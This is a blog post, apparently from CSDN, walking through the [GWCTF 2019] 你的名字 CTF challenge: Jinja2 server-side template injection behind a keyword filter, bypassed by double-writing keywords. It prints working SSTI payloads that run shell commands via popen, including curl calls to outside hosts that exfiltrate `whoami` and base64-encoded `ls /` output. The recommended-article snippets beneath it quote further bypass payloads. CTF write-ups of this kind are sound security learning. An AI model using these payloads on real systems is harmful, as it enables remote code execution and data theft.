BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习

最新推荐文章于 2025-10-24 18:30:00 发布
原创 最新推荐文章于 2025-10-24 18:30:00 发布 · 2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文记录了作者在GWCTF 2019比赛中遇到的一道关于SS TI(Server-Side Template Injection)的问题。在尝试通过抓包和扫目录寻找突破口未果后,作者转向了SSTI注入,并遇到了中文处理和PHP报错的挑战。通过学习Write-up,作者了解到题目中的PHP错误信息是误导,进一步研究了如何绕过过滤机制。最终,利用双写绕过策略构造了payload,但遇到了命令过滤问题,需要进一步的爆破或测试来解决。

目录:

参考:https://www.cnblogs.com/karsa/p/13523730.html

一、自己做:

抓包没啥,除非要扫目录,
在这里插入图片描述啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些,

在这里插入图片描述
感觉没思路了,,扫扫目录把。

别了,想到了ssti,试了一下:{{2*2}},报错了

Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13

而且,还不能处理中文??啊手动阀
在这里插入图片描述
一个{不报错,{{两个就报错,这是为什么,,,可能是PHP中输出变量用了{}来包裹起来了??

在这里插入图片描述
这样,突破点想不到,那就想想有什么危害把,

在这里插入图片描述

看WP把。。啊,,这个题是真的狗,,,

二、学到的&&不足:

三、学习WP:

啊,,WP说是SSTI注入,但是过滤了{{。。吐了要用{%。但是这里的报错是PHP的报错呀,,

作者说加了个php模式的报错和index.php路由。好吧,直接被骗到了。其实这里也能猜到可能是故意迷惑的,继续往下走。

测试发现{{会被过滤,然后就看bypass的payload,,,low的很,找前辈们写的SSTI绕过,看这个

直接用文章中payload打:

{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl https://qwert.free.beeceptor.com/?i=`whoami`').read()=='p' %}1{% endif %}

报错了,可能时有什么过滤,
在这里插入图片描述
然后爆破fuzz或者手动测试。

发现此payload中的if、os、class、mro,config,popen都会被过滤成空,那采取双写绕过的思想

os使用oconfigs,if使用iconfigf,class使用claconfigss,mro使用mrconfigo,popen使用popconfigen

payload:

{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl ip:5555/ -d `ls /|base64`;') %}1{% endiconfigf %}

注意,这里有几个点:

1. 所有被过滤的关键词都要进行相应替换
2. 这里执行的是curl 靶机ip。需要在buu中另开一台linux靶机进行监听
3. ls /是不行的,猜测会直接执行,所以要先用base加密输出,才可输出所有目录。
4. ls / |base64  要用反引号括起来,

监听靶机
在这里插入图片描述
解码后是这个,

app
bin
boot
dev
etc
flag_1s_Hera
home
lib
lib64
media
mn

然后换一下命令就好了

[GWCTF 2019]你的名字 - SSTI注入(waf绕过)
oZuoShen123的博客
10-10 596
分析 1、页面只有一个输入框,输入什么回显什么 2、根据特性应该是SSTI注入 解题 fuzz:过滤则长度1512 过滤:{{}}、class、mro、builtins、file、func_globals、import、args、eval、for、if、config、popen(将open过滤) 绕过:{{}}用{%print%}、关键字要么用attr(‘cla’'ss’)|attr(‘base’)形式绕过、要么用['__clas'+'s__']形式绕过、要么用clconfigass形式绕
BUUCTF 面具下的flag
Hrain7的博客
11-10 1217
x 代表解压缩文件,并且是按原始目录树解压(还有个参数 e 也是解压缩文件,但其会将所有文件都解压到根下,而不是自己原有的文件夹下)解压压缩包,是flag.vmdk,当时卡到这儿了,不知道接下来怎么做了,然后看了网上的wp,说是7z可以解压vmdk文件。压缩源文件数据区是无加密的,然而压缩源文件目录区是加密的,所以可判断为是伪加密。-o 是指定解压到的目录, -o后是没有空格的,直接接目录。key_part_one文件夹里是Brainfuck加密。命令:7z x 需要解压的文件名 -r -o./
BUUCTF刷题十一道(12)SSTI专题一
qq_45837896的博客
04-09 1072
SSTI填坑
2025 版最新 CTF 学习资源整理:含 BurpSuite/IDA 工具包、picoCTF 比赛时间,附解题思路 + BUUCTF 靶场,推荐收藏!
最新发布
shandongjiushen的博客
10-24 1480
1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.net/Category.php?Id=273、ctfhub在线工具:https://www.ctfhub.com/#/tools4、还有一些常用的网站字符串2进制互转:http://www.5ixuexiwang.com/str/from-binary.php。
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 4443
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
[GWCTF 2019]你的名字
cjdgg的博客
08-20 2285
[GWCTF 2019]你的名字 打开题目后界面如上所示,你输入什么名字后就会显示出来 说实话,这种题不出意外应该就是模板注入没跑了 试了下{{2+2}}直接报错,还是报的php的错,但是{2+2}就可以正常显示出来,这就说明{{可能被过滤了,而{可能没被过滤,所以我们再试一些只要{}就能用的句子试试,如{% set a=“test” %} 执行完了以后虽然没有回显但也没有报错,说明正常执行了这句话,确定了考点是模板注入后就得想想怎么绕过了 上网找了一篇模板注入绕过相关文章 这里用了if语句执行命令
精选资源
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
BUUCTF-Real-[Flask]SSTI
分享
02-02 1659
服务端模板注入SSTI,可进行代码执行操作!
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2719
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
精选资源
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
Flask Jinja2 SSTI Bypass
桃雾雨Rain的博客
02-19 1163
过滤[ 凡是在类中定义__getitem__方法,那么它的实例对象(假定为p),可以像这样p[key]取值,当实例对象做p[key]运算时,会调用类中的方法__getitem__。 ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen('dir').read() 关键字过滤(利用request) 利用 ...
SSTI Bypass 学习 (Python3&jinja2
qq_40648358的博客
05-25 1765
SSTI Bypass 学习 (Python3&jinja2 前言 在说Bypass之前咱们先说一下SSTI的基本功 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 利用流程 获取基本类-&g
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 6515
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
[CTF学习] 攻防世界进阶区学习,1分题 + 2分题
Only_kele_ 的博客
03-01 4676
攻防世界进阶区1分题+2分题(部分)
NOI 2018 你的名字
04-04 179
因为机房里的小伙伴都在看《你的名字。》而我不想看 所以来写了这道题... 给一个 $S$ 串,$q$ 次询问,每次一个 $T$ 串,问 $T$ 有多少没在 $S[l,r]$ 中以子串形式出现过的本质不同的子串 $|S|,q \leq 5e5,\sum |T| \leq 5e5$ sol: 容斥一下就变成了 $T$ 与 $S[l,r]$ 有多少本质不同的公共子串 首先把 ...
buuctf_misc_面具下的flag
m0_73118788的博客
03-01 686
这玩意贼有迷惑性,首先,key_part_two文件夹,在kail和windows打开是不一样的,二来,我kali打不开这文件夹,三来,这藏的另一个txt名字就很抽象。这文件下的叉我准备想解决的(因为kali说权限不够,不给开),但突然想到,我windows怎么不行!看到《你的名字》的联动,我开始做这题是很开心的。(当然我这记录得都是解决该问题正确的路线to me,中间看的其他博客和走的弯路不记录了)(留个问,这文件夹右下角"叉"什么意思,里面文件依然地,权限不够打不开)我实验复刻出来的不一样呐!
BUU [GWCTF 2019]mypassword
Jay17的博客
02-25 709
BUU [GWCTF 2019]mypassword
Java SSTI漏洞利用工具:ssti-payload生成器
- **ssti-payload-master**: 表示该压缩包的名称为`ssti-payload`,并且是主版本(master),表明这是源代码的主体版本,不一定是最新版本,但通常是稳定的版本。 #### 详细知识点 服务器端模板注入(SSTI)是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值